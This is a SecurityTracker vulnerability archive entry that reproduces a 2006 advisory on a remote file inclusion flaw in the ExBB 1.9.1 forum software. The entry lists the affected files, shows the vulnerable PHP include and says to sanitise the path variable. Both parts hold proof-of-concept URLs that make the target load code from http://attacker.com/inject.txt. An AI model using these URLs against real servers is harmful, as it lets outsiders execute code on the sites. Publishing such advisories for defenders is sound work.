SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (Forum/Board/Portal)  >   ExBB Vendors:   exbb.net
ExBB Include File Bug in 'exbb[home_path]' Parameter Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016773
SecurityTracker URL:  http://securitytracker.com/id/1016773
CVE Reference:   CVE-2006-4544   (Links to External Site)
Updated:  Jun 8 2008
Original Entry Date:  Aug 31 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.9.1
Description:   A vulnerability was reported in ExBB. A remote user can include and execute arbitrary code on the target system.

The software does not properly validate user-supplied input in the 'exbb[home_path]' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

The following files are affected:

/birstday/birst.php
/birstday/select.php
/birstday/profile_show.php
/newusergreatings/pm_newreg.php
/punish/p_error.php
/punish/profile.php
/threadstop/threadstop.php
/userstop/userstop.php

Some demonstration exploit URLs are provided:

http://[target]/[exbb_path]/modules/birstday/birst.php?exbb[home_path]=http://attacker.com/inject.txt?

http://[target]/[exbb_path]/modules/birstday/select.php?exbb[home_path]=http://attacker.com/inject.txt?

http://[target]/[exbb_path]/modules/birstday/profile_show.php?exbb[home_path]=http://attacker.com/inject.txt?

http://[target]/[exbb_path]/modules/newusergreatings/pm_newreg.php?exbb[home_path]=http://attacker.com/inject.txt?

http://[target]/[exbb_path]/modules/punish/p_error.php?exbb[home_path]=http://attacker.com/inject.txt?

http://[target]/[exbb_path]/modules/punish/profile.php?exbb[home_path]=http://attacker.com/inject.txt?

http://[target]/[exbb_path]/modules/threadstop/threadstop.php?exbb[home_path]=http://attacker.com/inject.txt?

http://[target]/[exbb_path]/modules/userstop/userstop.php?exbb[home_path]=http://attacker.com/inject.txt?

Ahmad Maulana a.k.a Matdhule reported this vulnerability.

The original advisory is available at:

http://advisories.echo.or.id/adv/adv46-matdhule-2006.txt

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.exbb.net/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:   Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Date:  Thu, 31 Aug 2006 02:46:01 +0000
Subject:  [ECHO_ADV_46$2006] ExBB v1.9.1 (exbb[home_path]) Multiple Remote File

ECHO.OR.ID

------------------------------------------------------------------------------

[ECHO_ADV_46$2006] ExBB v1.9.1 (exbb[home_path]) Multiple Remote File Inclusion

------------------------------------------------------------------------------


Author		: Ahmad Maulana a.k.a Matdhule

Date Found	: August, 30th 2006

Location	: Indonesia, Jakarta

web		: http://advisories.echo.or.id/adv/adv46-matdhule-2006.txt

Critical Lvl	: Highly critical

Impact		: System access

Where		: From Remote

---------------------------------------------------------------------------


Affected software description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ExBB 1.9.1


Application	: ExBB

version		: 1.9.1

URL		: http://www.exbb.net


---------------------------------------------------------------------------


Vulnerability:

~~~~~~~~~~~~~~


In folder birstday we found vulnerability script birst.php

---------------------------birst.php---------------------------------------

....

<?

  $birstdayconf = array();

  include ($exbb['home_path'].'modules/birstday/data/birstday_conf.php');

  include ($exbb['home_path'].'modules/birstday/language/'.$exbb['default_lang'].'/lang.php');


...

----------------------------------------------------------


Input passed to the "exbb['home_path']" parameter in birst.php is not

properly verified before being used. This can be exploited to execute

arbitrary PHP code by including files from local or external

resources.


Also affected files :


./select.php

./profile_show.php

../newusergreatings/pm_newreg.php

../punish/p_error.php

../punish/profile.php

../threadstop/threadstop.php

../userstop/userstop.php


Proof Of Concept:

~~~~~~~~~~~~~~~


http://target.com/[exbb_path]/modules/birstday/birst.php?exbb[home_path]=http://attacker.com/inject.txt?

http://target.com/[exbb_path]/modules/birstday/select.php?exbb[home_path]=http://attacker.com/inject.txt?

http://target.com/[exbb_path]/modules/birstday/profile_show.php?exbb[home_path]=http://attacker.com/inject.txt?

http://target.com/[exbb_path]/modules/newusergreatings/pm_newreg.php?exbb[home_path]=http://attacker.com/inject.txt?

http://target.com/[exbb_path]/modules/punish/p_error.php?exbb[home_path]=http://attacker.com/inject.txt?

http://target.com/[exbb_path]/modules/punish/profile.php?exbb[home_path]=http://attacker.com/inject.txt?

http://target.com/[exbb_path]/modules/threadstop/threadstop.php?exbb[home_path]=http://attacker.com/inject.txt?

http://target.com/[exbb_path]/modules/userstop/userstop.php?exbb[home_path]=http://attacker.com/inject.txt?


Solution:

~~~~~~~

- Sanitize variable $exbb['home_path'] on affected files.


---------------------------------------------------------------------------

Shoutz:

~~~

~ solpot a.k.a chris, J4mbi  H4ck3r thx for the hacking lesson    :)   

~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous

~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama, BlueSpy, str0ke

~ newbie_hacker@yahoogroups.com, jasakom_perjuangan@yahoogroups.com

~ Solpotcrew Comunity , #jambihackerlink #e-c-h-o @irc.dal.net

------------------------------------------------------------------------

---

Contact:

~~~~

 

     matdhule[at]gmail[dot]com

     

-------------------------------- [ EOF ]----------------------------------

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC